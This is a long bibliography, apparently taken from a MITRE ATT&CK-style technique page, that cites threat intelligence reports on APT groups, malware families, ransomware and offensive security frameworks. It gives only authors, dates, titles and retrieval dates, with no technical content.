- Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
- Chen, J. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
- Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.
- Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.
- Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
- Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.
- Jenkins, L. et al. (2022, August 4). ROADSWEEP Ransomware - Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations. Retrieved August 6, 2024.
- Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.
- Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
- Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.
- Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
- Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.
- Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.
- Jansen, W. (2021, January 12). Abusing cloud services to fly under the radar. Retrieved September 12, 2024.
- Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
- ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
- F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
- Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
- Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
- Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022.
- Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.
- Thomas, C. (n.d.). Mythic Documentation. Retrieved March 25, 2022.
- Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
- S2W TALON. (2022, June 16). Raccoon Stealer is Back with a New Version. Retrieved August 1, 2024.
- Quentin Bourgue, Pierre le Bourhis, & Sekoia TDR. (2022, June 28). Raccoon Stealer v2 - Part 1: The return of the dead. Retrieved August 1, 2024.
- Pierre Le Bourhis, Quentin Bourgue, & Sekoia TDR. (2022, June 29). Raccoon Stealer v2 - Part 2: In-depth analysis. Retrieved August 1, 2024.
- Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
- Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE. Retrieved June 19, 2020.
- Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.
- McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.
- Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.
- Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.
- Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.
- Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.
- Hawley, S. et al. (2023, February 2). Turla: A Galaxy of Opportunity. Retrieved May 15, 2023.
- ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.
- Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
- FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.
- Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.
- Patil, S. and Williams, M. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.
- Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.
- Lechtik, M., et al. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022.
- FBI et al. (2023, May 9). Hunting Russian Intelligence “Snake” Malware. Retrieved June 8, 2023.
- Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
- MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
- Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
- CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.
- Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
- Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
- Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
- ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
- Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.
- Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
- Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
- National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
- CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.
- Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.
- Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.
- Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.
- Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
- Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
- Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
- Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.
- Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
- Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
- Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
- Vrabie, V., et al. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved September 8, 2021.
- Savelesky, K., et al. (2019, July 23). ABADBABE 8BADFOOD: Discovering BADHATCH and a Detailed Look at FIN8's Tooling. Retrieved September 8, 2021.
- Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
- FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
- FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
- Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
- Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
- Falcone, R. and Miller-Osborn, J. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
- Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
- Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022.
- Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.
- Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
- Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021.
- Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.
- CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.
- Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.
- Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.
- The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.
- Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.
- Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.
- Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
- ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
- S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022.
- Falcone, R. et al. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.
- Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
- Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.
- An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
- Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.
- Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
- Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.
- Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.
- Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.
- Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved September 12, 2024.
- Patrick Schläpfer. (2024, April 10). Raspberry Robin Now Spreading Through Windows Script Files. Retrieved May 17, 2024.
- Lauren Podber and Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 17, 2024.
- Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.
- Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
- Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.
- Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
- Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
- Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
- ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
- Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.
- ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019.
- Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
- Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
- Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves. Retrieved April 9, 2021.
- FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.
- Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.
- Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.
- TheWover. (2019, May 9). donut. Retrieved March 25, 2022.
- Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
- Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.
- Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.
- Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.
- ClearSky Cyber Security. (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.
- Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.
- Falcone, R. and Miller-Osborn, J. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
- Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.
- Group-IB. (2021, November). RedCurl: The Awakening. Retrieved August 14, 2024.
- Group-IB. (2020, August). RedCurl: The Pentest You Didn’t Know About. Retrieved August 9, 2024.
- Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
- Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.
- ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
- Marczak, B. and Scott-Railton, J. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.
- Stepanic, D. and Bousseaden, S. (2024, May 15). Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID. Retrieved September 13, 2024.
- Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice. Retrieved May 31, 2024.
- Batista, J. (2024, June 17). Latrodectus, are you coming back?. Retrieved September 13, 2024.
- Raggi, M. Schwarz, D. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.
- Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.
- Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
- Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
- Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.
- Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.
- SecureWorks. (2019, August 27). LYCEUM Takes Center Stage in Middle East Campaign. Retrieved November 19, 2019.
- Sherstobitoff, R., Malhotra, A., et al. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
- McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.
- Robert Falcone, Jeff White, and Peter Renals. (2021, November 7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer. Retrieved February 8, 2024.
- Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
- Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.
- Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
- Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.
- GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.
- Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.
- S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.
- Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
- hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.
- Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.
- Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.
- Jurčacko, F. (2024, May 15). To the Moon and back(doors): Lunar landing in diplomatic missions. Retrieved June 26, 2024.
- ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.
- ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
- Kohler, A. and Lopez, C. (2024, April 30). Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware. Retrieved August 20, 2024.
- Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
- Nicolas Verdier. (n.d.). Retrieved January 29, 2018.
- Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.
- Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.
- Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.
- kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.
- ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.
- Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.
- NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
- Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
- Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.
- Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.
- Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
- Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
- Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
- BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.
- Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.
- NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.
- Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.
- Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.
- CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.
- Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.
- John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
- Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.
- Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.
- Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
- Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
- Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
- Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
- Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.
- Fishbein, N., Kajiloti, M. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.
- cobbr. (2021, April 21). Covenant. Retrieved September 4, 2024.
- Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.
- SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023.
- Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.
- Baumgartner, K., Golovkin, M. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.
- MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022.
- Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
- Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
- Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.
- Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.
- Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
- Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
- Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved September 12, 2024.
- GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.
- Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
- Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.
- Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.
- Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021.
- hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
- Amitai Ben & Shushan Ehrlich. (2021, May). From Wiper to Ransomware: The Evolution of Agrius. Retrieved May 21, 2024.
- Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
- Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.
- F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.
- Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.
- Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.
- Dutch Military Intelligence and Security Service (MIVD) & Dutch General Intelligence and Security Service (AIVD). (2024, February 6). Ministry of Defense of the Netherlands uncovers COATHANGER, a stealthy Chinese FortiGate RAT. Retrieved February 7, 2024.
- Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
- The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.
- Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
- Gorelik, M. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.
- Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
- Shelmire, A. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.
- Black Lotus Labs. (2024, August 27). Taking The Crossroads: The Versa Director Zero-Day Exploitation. Retrieved August 27, 2024.
- Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
- Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.
- Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
- Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
- Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.
- Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.
- Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
- Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.
- Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
- Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.
- Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.
- Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.
- Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021.
- Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.
- Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
- ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
- Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.
- DFIR. (2022, April 25). Quantum Ransomware. Retrieved July 26, 2024.
- DFIR. (2021, March 29). Sodinokibi (aka REvil) Ransomware. Retrieved July 22, 2024.
- Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
- Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.
- McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
- Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
